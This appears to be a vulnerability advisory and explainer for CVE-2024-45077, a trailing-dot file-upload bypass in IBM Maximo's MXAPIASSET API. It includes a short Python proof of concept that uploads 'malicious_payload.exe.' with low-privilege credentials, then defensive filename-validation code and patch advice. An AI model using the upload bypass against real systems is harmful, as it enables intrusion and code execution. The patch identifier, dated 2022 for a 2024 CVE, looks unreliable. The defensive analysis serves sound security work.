A recently discovered security vulnerability (CVE-2024-45077) in the IBM Maximo Asset Management 7.6.1.3 MXAPIASSET API allows authenticated low-privileged users to upload restricted file types simply by adding a dot to the end of the file name. This vulnerability can be exploited if Maximo is installed on a Windows operating system.
Background
IBM Maximo Asset Management is a comprehensive asset lifecycle and maintenance management solution that optimizes asset performance, extends asset life, and reduces operational downtime. The MXAPIASSET API provides a flexible and extensible interface for interacting with Maximo asset data.
Exploit Details
This vulnerability stems from insufficient input validation of file names in the MXAPIASSET API. An attacker with low-privileged access to the Maximo Asset Management system can bypass file extension restrictions by appending a dot to the end of the file name. This allows the attacker to upload potentially dangerous files that can lead to remote code execution, data exfiltration, or other malicious actions.
Here's a code snippet demonstrating the exploitation of this vulnerability:
import requests

# Endpoint and credentials used in the snippet (placeholder values)
maximo_url = 'https://example.com/maximo/oslc/os/mxasset'
auth = ('low_privilege_user', 'password')

# Prepare the file payload; note the trailing dot on the file name
with open('malicious_payload.exe.', 'rb') as file_data:
    payload = {'data': ('malicious_payload.exe.', file_data)}
    # Send the file upload request
    response = requests.post(maximo_url, files=payload, auth=auth)

if response.status_code == 200:
    print("File uploaded successfully")
else:
    print("Failed to upload file")
Mitigation
IBM has released a security patch (7.6.1.3-TIV-MAM_7613_IFIX.2022018) that addresses this vulnerability by validating file names more strictly and ensuring that file extension restrictions are enforced properly. It is highly recommended to upgrade to the latest version or apply the security patch as soon as possible.
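The following is an added illustration of what "validating file names more strictly" means for this class of bug; it is example code written for this page, not IBM's patch or any Maximo source. It places a deny-list check that inspects the submitted name as-is next to a check that first canonicalises the name the way the Windows filesystem will (basename only, trailing dots and spaces removed), and then goes one step further with an allow-list policy. The extension lists are constructed for the example; the page does not say which types Maximo restricts. It also covers trailing spaces, which Windows strips in the same way as trailing dots, even though the advisory only mentions the dot.

```python
import re

# Constructed sample policy for this example; the real restricted-type list
# used by Maximo is not given on the page.
BLOCKED_EXTENSIONS = {"exe", "dll", "bat", "cmd", "ps1", "jsp", "war"}
ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "txt", "csv"}


def _basename(filename: str) -> str:
    """Drop any directory components, whichever separator the client used."""
    return re.split(r"[\\/]", filename)[-1]


def extension_of(filename: str) -> str:
    """Text after the last dot, lower-cased; empty string if there is no dot."""
    base = _basename(filename)
    if "." not in base:
        return ""
    return base.rsplit(".", 1)[1].lower()


def is_blocked_weak(filename: str) -> bool:
    """Deny-list check on the name exactly as submitted.

    A trailing dot leaves an empty extension, so 'payload.exe.' is not
    recognised as .exe here, although Windows stores it as 'payload.exe'.
    """
    return extension_of(filename) in BLOCKED_EXTENSIONS


def normalize_windows_name(filename: str) -> str:
    """Canonicalise the way the Windows filesystem will before validating:
    keep the basename only and strip trailing dots and spaces."""
    return _basename(filename).rstrip(". ")


def is_blocked_hardened(filename: str) -> bool:
    """Deny-list check run on the canonical name, not the submitted one."""
    return extension_of(normalize_windows_name(filename)) in BLOCKED_EXTENSIONS


def is_upload_allowed(filename: str) -> bool:
    """Stricter policy: canonicalise, require a non-empty extension, reject
    anything blocked, and accept only allow-listed types."""
    name = normalize_windows_name(filename)
    if not name:
        return False
    ext = extension_of(name)
    if not ext or ext in BLOCKED_EXTENSIONS:
        return False
    return ext in ALLOWED_EXTENSIONS


def evaluate(names):
    """Map each name to (weak_blocked, hardened_blocked, allowed)."""
    return {
        n: (is_blocked_weak(n), is_blocked_hardened(n), is_upload_allowed(n))
        for n in names
    }


if __name__ == "__main__":
    # Constructed sample names, including the trailing-dot form from the advisory.
    samples = ["report.pdf", "malicious_payload.exe.", "malicious_payload.exe",
               "tool.ps1 ", "notes"]
    for name, (weak, hard, ok) in evaluate(samples).items():
        print(f"{name!r:28} weak_blocked={weak!s:5} "
              f"hardened_blocked={hard!s:5} allowed={ok}")
```

Running it shows `'malicious_payload.exe.'` passing the weak check and failing both hardened ones. The design point is that validation must run on the name the operating system will actually create, and that an allow-list with a mandatory extension fails closed where a deny-list has to anticipate every variant.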
References
1. IBM Maximo Asset Management 7.6.1.3 official website: https://www.ibm.com/products/maximo-asset-management
2. CVE-2024-45077 official advisory page: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45077
3. IBM Security Bulletin: https://www.ibm.com/support/pages/node/6720496
4. IBM Maximo Asset Management 7.6.1.3 documentation: https://www.ibm.com/docs/en/maximo-asset-mgmt?topic=software-maximo-asset-management-7613
Conclusion
The unrestricted file upload vulnerability in the IBM Maximo Asset Management 7.6.1.3 MXAPIASSET API (CVE-2024-45077) poses a significant risk to organizations running this software on Windows operating systems. It is crucial to apply the security patch or upgrade to the latest version as soon as possible to mitigate the risk of exploitation.
Timeline
Published on: 01/24/2025 16:15:36 UTC